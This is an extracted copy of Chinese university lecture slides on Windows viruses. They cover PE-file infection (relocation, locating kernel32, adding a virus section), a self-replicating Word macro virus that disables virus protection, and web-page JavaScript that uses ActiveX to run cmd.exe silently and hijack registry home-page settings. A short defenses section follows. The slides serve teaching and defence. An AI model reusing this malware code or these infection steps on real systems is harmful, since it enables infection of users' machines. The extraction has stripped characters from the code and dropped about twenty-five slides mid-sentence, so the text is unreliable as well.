Windows病毒分析 - 企業(yè)信息化課件

1、Windows病毒分析 - 企業(yè)信息化,1,計算機(jī)病毒Computer Virus,傅建明,武漢大學(xué)計算機(jī)學(xué)院,Windows病毒分析 - 企業(yè)信息化,2,第五章 Windows病毒分析,5.1 Win32 PE病毒 5.2 宏病毒 5.3 腳本病毒 5.4 網(wǎng)頁病毒 5.5 網(wǎng)絡(luò)蠕蟲,Windows病毒分析 - 企業(yè)信息化,3,5.1 Win32 PE病毒,SMC, Self Modifying Code Win32 PE病毒原理 Win32 PE病毒樣例,Windows病毒分析 - 企業(yè)信息化,4,SMC,Win32應(yīng)用程序是運(yùn)行在保護(hù)模式下的，每個Win32應(yīng)用程序都有相互獨(dú)立的4GB地

2、址空間，沒有段的區(qū)分，但不能在程序運(yùn)行的過程中隨便更改代碼段。一般有data段和text段，編譯器可以為不同的段指定不同屬性。 如何實現(xiàn)SMC？ 其實關(guān)鍵就在于鏈接時的參數(shù)，只要指定了代碼段的屬性是可寫的（默認(rèn)的參數(shù)是不可寫的）。在編譯、鏈接帶有SMC的Win32ASM時應(yīng)該這樣做： ml /c /coff %1.asm link /subsystem:windows /section:.text,RWE %1.obj,Windows病毒分析 - 企業(yè)信息化,5,SMC樣例,ShowMessage proto ReplaceMent proto .data szMsg1 db 這是未執(zhí)行SMC

3、之前的代碼！, 0 szMsg2 db SMC已經(jīng)執(zhí)行！, 0 szCaption db SMC demo by LC, 2002, 0 Replace_Len dd 0,Windows病毒分析 - 企業(yè)信息化,6,SMC樣例,code main: ;第一次執(zhí)行子程序ShowMessage，此時還沒執(zhí)行SMC操作 invoke ShowMessage lea eax, ReplaceMentEnd ;標(biāo)號ReplaceMent的結(jié)束 lea edx, ReplaceMentStart ;標(biāo)號ReplaceMent的開始 sub eax, edx ;標(biāo)號ReplaceMent的長度 mov Re

4、place_Len, eax ;把長度儲存起來 ;關(guān)鍵代碼！ lea esi, ReplaceMentStart ;標(biāo)號ReplaceMent的開始 lea edi, ShowMessageStart ;原程序ShowMessage的標(biāo)號的開始 mov ecx, Replace_Len ;標(biāo)號ReplaceMent的長度 rep movsb ;這里是最關(guān)鍵的語句！執(zhí)行SMC操作！ ;第二次執(zhí)行子程序ShowMessage，其內(nèi)容已經(jīng)不是第一次運(yùn)行時的內(nèi)容 invoke ShowMessage invoke ExitProcess, 0,Windows病毒分析 - 企業(yè)信息化,7,ShowMes

5、sage proc ;這里用“:”的話，就能夠使標(biāo)號成為全局性的 ShowMessageStart: invoke MessageBox, NULL, addr szMsg1, addr szCaption, MB_OK ShowMessageEnd: ;用nop來預(yù)留空間，以便后面的SMC能夠成功執(zhí)行； ;否則如果空間不夠，將有可能產(chǎn)生不可預(yù)測的錯誤： nop ret ShowMessage endp ReplaceMent proc ;將要用來SMC的代碼： ReplaceMentStart: invoke MessageBox, NULL, addr szMsg2, addr szCap

6、tion, MB_OK or MB_ICONINFORMATION ReplaceMentEnd: ret ReplaceMent endp end main,Windows病毒分析 - 企業(yè)信息化,8,Win32 PE病毒原理,一、病毒的重定位 病毒不可避免也要用到變量（常量），當(dāng)病毒感染HOST程序后，由于其依附到HOST程序中的位置各有不同，病毒隨著HOST載入內(nèi)存后，病毒中的各個變量（常量）在內(nèi)存中的位置自然也會隨著發(fā)生變化,Windows病毒分析 - 企業(yè)信息化,9,Win32 PE病毒原理,call delta ;執(zhí)行后，堆棧頂端為delta在內(nèi)存中的真正地址 delta:pop

7、ebp ;這條語句將delta在內(nèi)存中的真正地址存放在ebp寄存器中 lea eax,ebp+(offset var1-offset delta) ;這時eax中存放著var1在內(nèi)存中的真實地址,Windows病毒分析 - 企業(yè)信息化,10,Win32 PE病毒原理,二、獲取API函數(shù)地址 Win32 PE病毒和普通Win32 PE程序一樣需要調(diào)用API函數(shù)，但是普通的Win32 PE程序里面有一個引入函數(shù)表，該函數(shù)表對應(yīng)了代碼段中所用到的api函數(shù)在動態(tài)連接庫中的真實地址。這樣，調(diào)用api函數(shù)時就可以通過該引入函數(shù)表找到相應(yīng)api函數(shù)的真正執(zhí)行地址。 但是，對于Win32 PE病毒來說，他只

8、有一個代碼段，他并不存在引入函數(shù)段。要獲得API函數(shù)地址，我們首先需要獲得Kernel32的基地址,Windows病毒分析 - 企業(yè)信息化,11,Win32 PE病毒原理,二、獲取API函數(shù)地址 當(dāng)系統(tǒng)打開一個可執(zhí)行文件的時候，它會調(diào)用Kernel32.dll中的CreateProcess函數(shù)；CreateProcess函數(shù)在完成裝載應(yīng)用程序后，會先將一個返回地址壓入到堆棧頂端，然后轉(zhuǎn)向執(zhí)行剛才裝載的應(yīng)用程序。當(dāng)該應(yīng)用程序結(jié)束后，會將堆棧頂端數(shù)據(jù)彈出放到IP中，繼續(xù)執(zhí)行。剛才堆棧頂端保存的數(shù)據(jù)是什么呢？這個數(shù)據(jù)其實就是在Kernal32.dll中的返回地址,Windows病毒分析 - 企業(yè)信息

9、化,12,mov ecx,esp ；將堆棧頂端的數(shù)據(jù)（返回Kernel32的地址）賦給ecx xor edx,edx getK32Base: dec ecx ;逐字節(jié)比較驗證，也可以一頁一頁地搜 mov dx,word ptr ecx+IMAGE_DOS_HEADER.e_lfanew ;就是ecx+3ch test dx,0f000h ;Dos Header+stub不可能太大,超過4096byte jnz getK32Base ;加速檢驗 cmp ecx,dword ptr ecx+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase jnz getK

10、32Base ;看Image_Base值是否等于ecx即模塊起始值 mov ebp+offset k32Base,ecx ;如果是,到kernel32的Base值,Windows病毒分析 - 企業(yè)信息化,13,a）已知函數(shù)的導(dǎo)出序號 （1）定位到PE文件頭。 （2）從PE文件頭中的可選文件頭中取出數(shù)據(jù)目錄表的第一個數(shù)據(jù)目錄，得到導(dǎo)出表的地址。 （3）從導(dǎo)出表的Base字段取得起始序號。 （4）將需要查找的導(dǎo)出序號減去起始序號，得到函數(shù)在入口地址表中的索引。 （5）檢查索引值是否大于等于導(dǎo)出表中的函數(shù)個數(shù)。如果大于的話，說明輸入的序號無效。 （6）用該索引值在AddressOfFunctions

11、字段指向的導(dǎo)出函數(shù)入口地址表中取出相應(yīng)的項目，這就是函數(shù)的入口地址RVA值，當(dāng)函數(shù)被裝入內(nèi)存后，這個RVA值加上模塊實際裝入的基址(ImageBase)，就得到了函數(shù)真正的入口地址,Windows病毒分析 - 企業(yè)信息化,14,b）從函數(shù)名稱查找入口地址 （1）定位到PE文件頭。 （2）從PE文件頭中的可選文件頭中取出數(shù)據(jù)目錄表的第一個數(shù)據(jù)目錄，得到導(dǎo)出表的地址。 （3）從導(dǎo)出表的NumberOfNames字段得到以命名函數(shù)的總數(shù)，并以這個數(shù)字做微循環(huán)的次數(shù)來構(gòu)造一個循環(huán)。 （4）從AddressOfNames字段指向的函數(shù)名稱地址表的第一項開始，在循環(huán)中將每一項定義的函數(shù)名與要查找的函數(shù)名比

12、較，如果沒有任何一個函數(shù)名符合，說明文件中沒有指定名稱的函數(shù)。 （5）如果某一項定義的函數(shù)名與要查找的函數(shù)名符合，那么記住這個函數(shù)名在字符串地址表中的索引值（如x），然后在AddressOfNameOrdinals指向的數(shù)組中以同樣的索引值x去找數(shù)組項中的值，假如該值為m。 （6）以m值作為索引值，在AddressOfFunctions字段指向的函數(shù)入口地址表中獲取的RVA就是函數(shù)的入口地址，當(dāng)函數(shù)被裝入內(nèi)存后，這個RVA值加上模塊實際裝入的基址(ImageBase)，就得到了函數(shù)真正的入口地址,Windows病毒分析 - 企業(yè)信息化,15,Win32 PE病毒原理,三、關(guān)于文件搜索 搜索文件

13、是病毒尋找目標(biāo)文件的非常重要的功能。在Win32匯編中，通常采用兩個API函數(shù)進(jìn)行文件搜索。 a）FindFirstFile b) FindNextFile C) FindClose,Windows病毒分析 - 企業(yè)信息化,16,WIN32_FIND_DATA STRUCT dw DWORD ?/文件屬性， /如果改值為，則說明是目錄 ftCreationTime /文件創(chuàng)建時間 ftLastAccessTime /文件或目錄的訪問時間 ftLastWriteTime /文件最后一次修改時間，對于目錄是創(chuàng)建時間 n DWORD ?/文件大小的高位 n DWORD ? /文件大小的地位 dwRe

14、served0 DWORD ?/保留 dwReserved1 DWORD ?/保留 c BYTE MAX_PATH dup(?) /文件名字符串，以0結(jié)尾 cAlternate BYTE 14 dup(?)/8.3格式的文件名 WIN32_FIND_DATA ENDS,Windows病毒分析 - 企業(yè)信息化,17,Win32 PE病毒原理,四、內(nèi)存映射文件 內(nèi)存映射文件提供了一組獨(dú)立的函數(shù)，是應(yīng)用程序能夠通過內(nèi)存指針像訪問內(nèi)存一樣對磁盤上的文件進(jìn)行訪問。這組內(nèi)存映射文件函數(shù)將磁盤上的文件的全部或者部分映射到進(jìn)程虛擬地址空間的某個位置，以后對文件內(nèi)容的訪問就如同在該地址區(qū)域內(nèi)直接對內(nèi)存訪問一樣簡

15、單。這樣，對文件中數(shù)據(jù)的操作便是直接對內(nèi)存進(jìn)行操作，大大地提高了訪問的速度，這對于計算機(jī)病毒來說，對減少資源占有是非常重要的,Windows病毒分析 - 企業(yè)信息化,18,Win32 PE病毒原理,在計算機(jī)病毒中，通常采用如下幾個步驟： a） 調(diào)用CreateFile函數(shù)打開想要映射的HOST程序，返回文件句柄hFile。 b） 調(diào)用Create函數(shù)生成一個建立基于HOST文件句柄hFile的內(nèi)存映射對象，返回內(nèi)存映射對象句柄hMap。 c） 調(diào)用MapViewOfFile函數(shù)將整個文件（一般還要加上病毒體的大小）映射到內(nèi)存中。得到指向映射到內(nèi)存的第一個字節(jié)的指針(pMem)。 d） 用剛才得

16、到的指針pMem對整個HOST文件進(jìn)行操作，對HOST程序進(jìn)行病毒感染。 e） 調(diào)用UnmapViewFile函數(shù)解除文件映射，傳入?yún)?shù)是pMem。 f)調(diào)用CloseHandle來關(guān)閉內(nèi)存映射文件，傳入?yún)?shù)是hMa,Windows病毒分析 - 企業(yè)信息化,19,五、病毒如何感染其他文件 PE病毒常見的感染其他文件的方法是在文件中添加一個新節(jié)，然后往該新節(jié)中添加病毒代碼和病毒執(zhí)行后的返回Host程序的代碼，并修改文件頭中代碼開始執(zhí)行位置（AddressOfEntryPoint）指向新添加的病毒節(jié)的代碼入口，以便程序運(yùn)行后先執(zhí)行病毒代碼。 主要的工作： 1、增加一個節(jié)表項 ； 2、增加節(jié)表指向的

17、數(shù)據(jù)段（病毒代碼）；/注意對齊 3、調(diào)整文件映像尺寸，節(jié)表數(shù)。SizeofImage/NumberofSections,Win32 PE病毒原理,Windows病毒分析 - 企業(yè)信息化,20,感染文件的基本步驟： 1判斷目標(biāo)文件開始的兩個字節(jié)是否為“MZ”。 2判斷PE文件標(biāo)記“PE”。 3判斷感染標(biāo)記，如果已被感染過則跳出繼續(xù)執(zhí)行HOST程序，否則繼續(xù)。 4獲得Directory（數(shù)據(jù)目錄）的個數(shù)，（每個數(shù)據(jù)目錄信息占8個字節(jié)）。 5得到節(jié)表起始位置。(Directory的偏移地址+數(shù)據(jù)目錄占用的字節(jié)數(shù)=節(jié)表起始位置) 6得到目前最后節(jié)表的末尾偏移（緊接其后用于寫入一個新的病毒節(jié)） 節(jié)表起始

18、位置+節(jié)的個數(shù)*(每個節(jié)表占用的字節(jié)數(shù)28H)=目前最后節(jié)表的末尾偏移。 7開始寫入節(jié)表,Win32 PE病毒原理,Windows病毒分析 - 企業(yè)信息化,21,a） 寫入節(jié)名（8字節(jié)）。 b） 寫入節(jié)的實際字節(jié)數(shù)（4字節(jié)）。 c） 寫入新節(jié)在內(nèi)存中的開始偏移地址（4字節(jié)），同時可以計算出病毒入口位置 上節(jié)在內(nèi)存中的開始偏移地址+（上節(jié)大小/節(jié)對齊+1）節(jié)對齊=本節(jié)在內(nèi)存中的開始偏移地址。 d） 寫入本節(jié)（即病毒節(jié)）在文件中對齊后的大小。 e） 寫入本節(jié)在文件中的開始位置。 上節(jié)在文件中的開始位置+上節(jié)對齊后的大小=本節(jié)（即病毒）在文件中的開始位置。 f） 修改映像文件頭中的節(jié)表數(shù)目。 g）

19、修改AddressOfEntryPoint（即程序入口點(diǎn)指向病毒入口位置），同時保存舊的AddressOfEntryPoint，以便返回HOST繼續(xù)執(zhí)行。 h） 更新SizeOfImage（內(nèi)存中整個PE映像尺寸=原SizeOfImage+病毒節(jié)經(jīng)過內(nèi)存節(jié)對齊后的大?。?。 i） 寫入感染標(biāo)記（后面例子中是放在PE頭中）。 j） 寫入病毒代碼到新添加的節(jié)中。 ECX =病毒長度 ESI =病毒代碼位置（并不一定等于病毒執(zhí)行代碼開始位置） EDI=病毒節(jié)寫入位置（后面例子是在內(nèi)存映射文件中的相應(yīng)位置） 將當(dāng)前文件位置設(shè)為文件末尾,Windows病毒分析 - 企業(yè)信息化,22,Win32 PE病毒原

20、理,六、病毒如何返回到Host程序 返回HOST程序相對來說比較簡單，病毒在修改被感染文件代碼開始執(zhí)行位置（AddressOfEntryPoint）時，會保存原來的值，這樣，病毒在執(zhí)行完病毒代碼之后用一個跳轉(zhuǎn)語句跳到這段代碼處繼續(xù)執(zhí)行即可,Windows病毒分析 - 企業(yè)信息化,23,Win32 PE病毒-樣例,Main.asm: S_api.asm：API地址 Modipe.asm：增加新節(jié)，修改相應(yīng)參數(shù)值 Dis_len.asm：顯示信息,Windows病毒分析 - 企業(yè)信息化,24,宏病毒,定義：宏病毒是使用宏語言編寫的程序，可以在一些數(shù)據(jù)處理系統(tǒng)中運(yùn)行（主要是微軟的辦公軟件系統(tǒng)，字處理

21、、電子數(shù)據(jù)表和其他Office程序中），存在于字處理文檔、數(shù)據(jù)表格、數(shù)據(jù)庫、演示文檔等數(shù)據(jù)文件中，利用宏語言的功能將自己復(fù)制并且繁殖到其他數(shù)據(jù)文檔里。 一段宏程序可以附著在一個文檔文件后面。（寄生） 宏程序可以從一個文件拷貝到另外一個文件。（傳染） 存在一種宏程序可以不需要用戶的干預(yù)而自動執(zhí)行的機(jī)制。（控制權(quán),Windows病毒分析 - 企業(yè)信息化,25,宏病毒的感染都是通過宏語言本身的功能實現(xiàn)的，比如說增加一個語句、增加一個宏等等，宏病毒的執(zhí)行離不開宏語言運(yùn)行環(huán)境。 宏病毒是跨平臺的。 所謂宏，就是指一段類似于批處理命令的多行代碼的集合。在Word中可以通過ALT+F8查看存在的宏，通過AL

22、T+F11調(diào)用宏編輯窗口,宏病毒,Windows病毒分析 - 企業(yè)信息化,26,Sub MyFirstVBAProcedure() Dim NormProj Msgbox 歡迎光臨武漢大學(xué)信息安全實驗室！,0,宏病毒測試 Set NormProj = NormalTemplate.VBProject MsgBox NormProj.Name, 0, 模塊文件名 顯示模板文件的名字 With Assistant.NewBalloon 調(diào)出助手 .Icon = msoIconAlert .Animation = msoAnimationGetArtsy .Heading = Attention，P

23、lease! .Text = Today I turn into a martian! .Show End With End Sub,宏病毒,Windows病毒分析 - 企業(yè)信息化,27,使用微軟的字處理軟件WORD，用戶可以進(jìn)行打開文件、保存文件、打印文件和關(guān)閉文件等操作,宏病毒獲取控制權(quán),Windows病毒分析 - 企業(yè)信息化,28,On Error Resume Next 如果發(fā)生錯誤，不彈出出錯窗口，繼續(xù)執(zhí)行下面語句 Application.DisplayAlerts = wdAlertsNone 不彈出警告窗口 Application.EnableCancelKey = wdCanc

24、elDisabled 不允許通過ESC鍵結(jié)束正在運(yùn)行的宏 Application.DisplayStatusBar = False 不顯示狀態(tài)欄，以免顯示宏的運(yùn)行狀態(tài)Options.VirusProtection = False 關(guān)閉病毒保護(hù)功能，運(yùn)行前如果包含宏，不提示 Options.SaveNormalPrompt = False 如果公用模塊被修改，不給用戶提示窗口而直接保存 Application.ScreenUpdating = False 不讓刷新屏幕，以免病毒運(yùn)行引起速度變慢,宏病毒的隱藏,Windows病毒分析 - 企業(yè)信息化,29,宏病毒的隱藏,病毒為了防止被用戶手工發(fā)現(xiàn)，

25、他會屏蔽一些命令菜單功能，譬如“工具宏”等菜單按鈕的功能。 Sub ViewVBCode() End Sub ViewCode：該過程和ViewVBCode函數(shù)一樣，如果用戶按工具欄上的小圖標(biāo)就會執(zhí)行這個過程。ToolsMacro：當(dāng)用戶按下“ALT+F8”或者“工具宏”時調(diào)用的過程函數(shù)。 ：當(dāng)顯示一個模板的所有宏時，調(diào)用的過程函數(shù),Windows病毒分析 - 企業(yè)信息化,30,宏病毒的隱藏,來使菜單按鈕失效： CommandBars(Tools).Controls(16).Enabled = False 用來使“工具宏”菜單失效的語句 CommandBars(“Tools”).Control

26、s(16).Delete 刪除“工具宏”菜單 CommandBars(i).Controls(j).Enabled = False,Windows病毒分析 - 企業(yè)信息化,31,宏病毒如何傳播,宏分成兩種，一種是每個文檔中間包含的內(nèi)嵌的宏，譬如宏，另外一種是屬于WORD應(yīng)用程序，為所有打開的文檔共用的宏，譬如AutoOpen宏。 任何WORD宏病毒一般首先都是藏身在一個指定的WORD文件中，一旦打開了這個WORD文件，宏病毒就被執(zhí)行了，宏病毒要做的第一件事情就是將自己拷貝到全局宏的區(qū)域，使得所有打開的文件都會使用這個宏。當(dāng)WORD退出的時候，全局宏將被存放在某個全局的模板文件（.DOT文件）中

27、，這個文件的名字通常是“NORMAL.DOT”，也就是前面講到的Normal模板,Windows病毒分析 - 企業(yè)信息化,32,宏病毒如何傳播,Sub AutoClose() On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False 以

28、上是病毒基本的自我保護(hù)措施 Set Doc = ActiveDocument.VBProject.VBComponents 取當(dāng)前活動文檔中工程組件集合 Set Tmp = NormalTemplate.VBProject.VBComponents 取Word默認(rèn)模板中工程組件集合 Const ExportSource = c:jackie.sys Const VirusName = AIGTMV 該字符串相當(dāng)于一個病毒感染標(biāo)志 Application.VBE.ActiveVBProject.VBComponents(VirusName).Export ExportSource 將當(dāng)前病毒代碼

29、導(dǎo)出到c:jackie.sys文件保存,Windows病毒分析 - 企業(yè)信息化,33,宏病毒如何傳播,For i = 1 To Tmp.Count If Tmp(i).Name = VirusName Then TmpInstalled = 1 Next i 檢查模板是否已經(jīng)被感染病毒 For j = 1 To Doc.Count If Doc(j).Name = VirusName Then DocInstalled = 1 Next j 檢查當(dāng)前活動文檔是否已被感染病毒 If TmpInstalled = 0 Then 如果模板沒有被感染，對其進(jìn)行感染 Tmp.Import ExportS

30、ource 從c:jackie.sys將病毒導(dǎo)入模板 NormalTemplate.Save 自動保存模板，以免引起用戶懷疑 End If If DocInstalled = 0 Then 如果當(dāng)前活動文檔沒有被感染 Doc.Import ExportSource 從c:jackie.sys將病毒導(dǎo)入當(dāng)前活動文檔 ActiveDocument.SaveAs ActiveDocument.FullName 自動保存當(dāng)前活動文檔 End If MsgBox Word instructional macro by jackie, 0, Word.APMP End Sub,Windows病毒分析 -

31、企業(yè)信息化,34,宏病毒如何傳播,1Export 用來將當(dāng)前對象保存到目標(biāo)文件，注意目標(biāo)文件必須是不存在的，否則會出現(xiàn)錯誤。它使用如下形式進(jìn)行調(diào)用：object.Export()。 2Import 用來將目標(biāo)文件代碼導(dǎo)入到當(dāng)前對象，目標(biāo)文件應(yīng)該是已經(jīng)存在的。它使用如下形式進(jìn)行調(diào)用：object.Import()。 3AddFromFile 用來將目標(biāo)文件導(dǎo)入到當(dāng)前模塊對象。它使用如下形式進(jìn)行調(diào)用 ：object.AddFormFile 。其中object為標(biāo)準(zhǔn)模塊或類模塊。 4AddFromString 該方法用來將一段字符串插入到當(dāng)前對象中。它使用如下形式進(jìn)行調(diào)用：object.AddFro

32、mString stringexpression。其中其中object為標(biāo)準(zhǔn)模塊或類模塊，stringexpression為字符串表達(dá)式,Windows病毒分析 - 企業(yè)信息化,35,5Lines 該方法用來獲取一個文檔中的某些行。它使用如下形式進(jìn)行調(diào)用：object.Lines(startline,count)，其中其中object為標(biāo)準(zhǔn)模塊或類模塊，其中startline為開始的行號，count為要獲得的行數(shù)。 6InsertLines 該方法用來在當(dāng)前對象的某個位置插入一行或多行代碼。它使用如下形式進(jìn)行調(diào)用：object.InsertLines line,code。其中object為標(biāo)準(zhǔn)

33、模塊或類模塊，line為要從當(dāng)前文檔插入的行號，code為要插入的代碼變量。 7DeleteLines 該方法用來刪除當(dāng)前對象的代碼行。它使用如下形式進(jìn)行調(diào)用：object.DeleteLines startline, count。其中其中其中object為標(biāo)準(zhǔn)模塊或類模塊，其中startline為開始的行號，count為要刪除的行數(shù)。 8ReplaceLine 該方法用來替換當(dāng)前代碼對象中相應(yīng)的行。它使用如下形式進(jìn)行調(diào)用：object.ReplaceLine(line,code)。其中object為標(biāo)準(zhǔn)模塊或類模塊，line為要被替換行的行號，code為對行進(jìn)行替換的代碼。 9Item 該方

34、法用來取組件的對象。其使用如下形式進(jìn)行調(diào)用：object.Item(index)。其中index為對象集合中的序號,Windows病毒分析 - 企業(yè)信息化,36,有一些簡單的辦法可以判斷一個文件是否被宏病毒感染。首先打開你的WORD，選擇菜單：工具（Tools）宏（Macro）宏列表（Macros），或者直接按ALT+F11，如果發(fā)現(xiàn)里面有很多以“Auto”開始的宏，那么你很可能被宏病毒感染了,宏病毒如何發(fā)現(xiàn),Windows病毒分析 - 企業(yè)信息化,37,腳本病毒,任何語言都是可以編寫病毒的。而用腳本編寫病毒，則尤為簡單并且編出的病毒具有傳播快、破壞力大的特點(diǎn)。譬如愛蟲病毒及新歡樂時光病毒、叛

35、逃者病毒就是采用VBS腳本編寫的。另外還有PHP，JS腳本病毒等,Windows病毒分析 - 企業(yè)信息化,38,WSH介紹,WSH，是“Windows Scripting Host”的縮略形式，其通用的中文譯名為“Windows 腳本宿主”。 一個腳本文件，后綴為 .VBS 或 .JS，然后在 Windows 下雙擊執(zhí)行它，這時，系統(tǒng)就會自動調(diào)用一個適當(dāng)?shù)某绦騺韺λM(jìn)行解釋并執(zhí)行，而這個程序就是Windows Scripting Host，程序執(zhí)行文件名為Wscript.exe （若是在命令行下，則為 Cscript.exe,Windows病毒分析 - 企業(yè)信息化,39,WSH的作用,腳本帶來

36、非常強(qiáng)大的功能，例如：我們可以利用它完成映射網(wǎng)絡(luò)驅(qū)動器、檢索及修改環(huán)境變量、處理注冊表項、對文件系統(tǒng)進(jìn)行操作等工作；管理員還可以使用WSH的支持功能來創(chuàng)建簡單的登陸腳本，甚至可以編寫腳本來管理活動目錄,Windows病毒分析 - 企業(yè)信息化,40,WSH的內(nèi)置對象,Windows病毒分析 - 企業(yè)信息化,41,WSH的內(nèi)置對象,Wscript對象的主要作用是提取命令行變量，確定腳本文件名，確定 WSH 執(zhí)行文件名（wscript.exe 還是 cscript.exe），確認(rèn) host 版本信息，創(chuàng)建、關(guān)聯(lián)及分離 COM 對象，寫入事件，按程序結(jié)束一個腳本文件的運(yùn)行，向默認(rèn)的輸出設(shè)備（如對話框、

37、命令行）輸出信息等,Windows病毒分析 - 企業(yè)信息化,42,WSH的內(nèi)置對象,WshArguments 的作用是獲取全部的命令行變量； WshNamed負(fù)責(zé)獲取指定的命令行參數(shù) WshUnnamed負(fù)責(zé)獲取未經(jīng)指定的命令行參數(shù)集；WshNetwork的主要作用是開放或關(guān)閉網(wǎng)絡(luò)共享，連接或斷開網(wǎng)絡(luò)打印機(jī)，映射或取消網(wǎng)絡(luò)中的共享，獲取當(dāng)前登陸用戶的信息；WshController可以創(chuàng)建一個遠(yuǎn)程腳本對象,Windows病毒分析 - 企業(yè)信息化,43,WSH的內(nèi)置對象,WshRemote可以實現(xiàn)網(wǎng)絡(luò)中對計算機(jī)系統(tǒng)的遠(yuǎn)程管理，也可按計劃對其它程序/腳本進(jìn)行處理；WshRemote Error的作

38、用在于：當(dāng)一個遠(yuǎn)程腳本（WshRemote 對象）因腳本錯誤而終止時，獲取可用的錯誤信息； WshShell 主要負(fù)責(zé)程序的本地運(yùn)行，處理注冊表項、創(chuàng)建快捷方式、獲取系統(tǒng)文件夾信息，處理環(huán)境變量； WshShortcut主要用于按計劃創(chuàng)建快捷方式；WshSpecialfolders用于獲取任意一個 Windows特殊文件夾的信息,Windows病毒分析 - 企業(yè)信息化,44,WSH的內(nèi)置對象,WshURLShortcut用于按程序要求創(chuàng)建進(jìn)入互聯(lián)網(wǎng)資源的快捷方式；WshEnvironment用于獲取任意的環(huán)境變量（如WINDIR,PATH,或PROMPT）；WshScriptExec 用于確定

39、一個腳本文件的運(yùn)行狀態(tài)及錯誤信息,Windows病毒分析 - 企業(yè)信息化,45,WSH的使用,以任何文本編輯器編輯，然后保存為.js /.vbs。 EX1： WScript.Echo(“歡迎光臨武漢大學(xué)信息安全實驗室”,Windows病毒分析 - 企業(yè)信息化,46,WSH的使用,EX2： dim newdir set newdir=wscript.createobject(scripting.) for k=1 to 10 anewfolder=c:chapter /把“cmd.exe”改為“”則對Windows 95/98/ME也有效，下同。,Windows病毒分析 - 企業(yè)信息化,72,網(wǎng)

40、頁病毒,function runcmd() a=document.applets0; a.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B); a.createInstance(); wsh=a.GetObject(); wsh.Run(cmd.exe);/改為“wsh.Run(cmd.exe,false,1);”則程序在后臺隱藏運(yùn)行 setTimeout(runcmd(),10);,Windows病毒分析 - 企業(yè)信息化,73,修改注冊表,ActiveX可以應(yīng)用于網(wǎng)頁編制語言中，利用JavaScript語句輕易就可以把ActiveX嵌入到Web頁面中

41、,Windows病毒分析 - 企業(yè)信息化,74,初始化activeX控件 document.write() /初始化actiVex控件結(jié)束 /定義過程 function f() try /設(shè)定applets為0 a1=document.applets0 /初始化Windows Script Host Shell Object a1.setCLSID(f935dc22-1cf0-11d0-adb9-00c04fd58a0b) a1.createInstance() Shl=a1.GetObject() try /開始寫注冊表/設(shè)定IE的標(biāo)題為Internet Explorer Shl.RegWr

42、ite (HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title,Internet Explorer) /設(shè)定IE的默認(rèn)首頁為我們自己的主頁 Shl.RegWrite (HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page,)/讓設(shè)定首頁那項變灰 Shl.RegWrite(HKEY_USERS.DEFAULTSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage,0

43、x1,REG_DWORD) catch(e) catch(e) function init() /1000毫秒后開始調(diào)用函數(shù)f() setTimeout(f(),1000) init(),Windows病毒分析 - 企業(yè)信息化,75,操縱用戶文件系統(tǒng),通過創(chuàng)建WSH對象事例而直接在用戶機(jī)器中執(zhí)行文件的例子。通過FSO和WSH配合就可以達(dá)到將病毒寫到機(jī)器中并使之執(zhí)行的目的,Windows病毒分析 - 企業(yè)信息化,76,初始化activeX控件 document.write() function runcmd() a1=document.applets0; a1.setCLSID(F935DC22

44、-1CF0-11D0-ADB9-00C04FD58A0B); a1.createInstance(); wsh=a1.GetObject(); a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228); a1.createInstance(); fso=a1.GetObject(); var testfile=test; var t(test); t(測試程序); t(Wscript.echo hello,world); wsh.Run(wscript.exe test); setTimeout(runcmd(),10); document.write

45、(這只是個測試頁面，所包含的可執(zhí)行程序無任何危害。),Windows病毒分析 - 企業(yè)信息化,77,防范措施,1、在IE的“internet選項”的“安全”項中把“安全級別”設(shè)為“高”，或在“自定義級別”中把“對標(biāo)記為可安全執(zhí)行的ActiveX控件執(zhí)行腳本”標(biāo)記為“禁用”。 2、刪除一些危險的對象: 1）禁用Wscript.Shell對象，阻止其運(yùn)行程序。 刪除或更名系統(tǒng)文件夾中的wshom.ocx 或刪除注冊表項： HKEY_LOCAL_MACHINESOFTWAREClassesCLSIDF935DC22-1CF0-11D0-ADB9-00C04FD58A0B 2）禁用對象，阻止讀寫文件。

46、 刪除或更名系統(tǒng)文件夾中的scrrun.dll 或刪除注冊表項,Windows病毒分析 - 企業(yè)信息化,78,防范措施,3、對于第一種情況，如果你的注冊表已經(jīng)被惡意網(wǎng)頁修改，你可以查看該網(wǎng)頁代碼修改注冊表的哪些項。譬如，它修改的語句為： Shl.RegWrite (HKEY_USERS.DEFAULTSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage,0 x1,REG_DWORD) 那么我們就將該語句修改為： Shl.RegDelete (HKEY_USERS.DEFAULTSoftwarePoliciesMicros

47、oftInternet ExplorerControl PanelHomePage,Windows病毒分析 - 企業(yè)信息化,79,網(wǎng)絡(luò)蠕蟲,1988年11月Morris-worm 2001年7月CodeRed 2001年9月Nimda 2003年1月Slammer (蠕蟲王) 2003年8月MSBLaster（沖擊波） 2004年1月MyDoom 2004年4月Sasser（震動波,Windows病毒分析 - 企業(yè)信息化,80,網(wǎng)絡(luò)蠕蟲,計算機(jī)蠕蟲的兩個最基本特征：“可以從一臺計算機(jī)移動到另一臺計算機(jī)”和“可以自我復(fù)制”。 計算機(jī)蠕蟲可以獨(dú)立運(yùn)行，并能把自身的一個包含所有功能的版本傳播到另外的

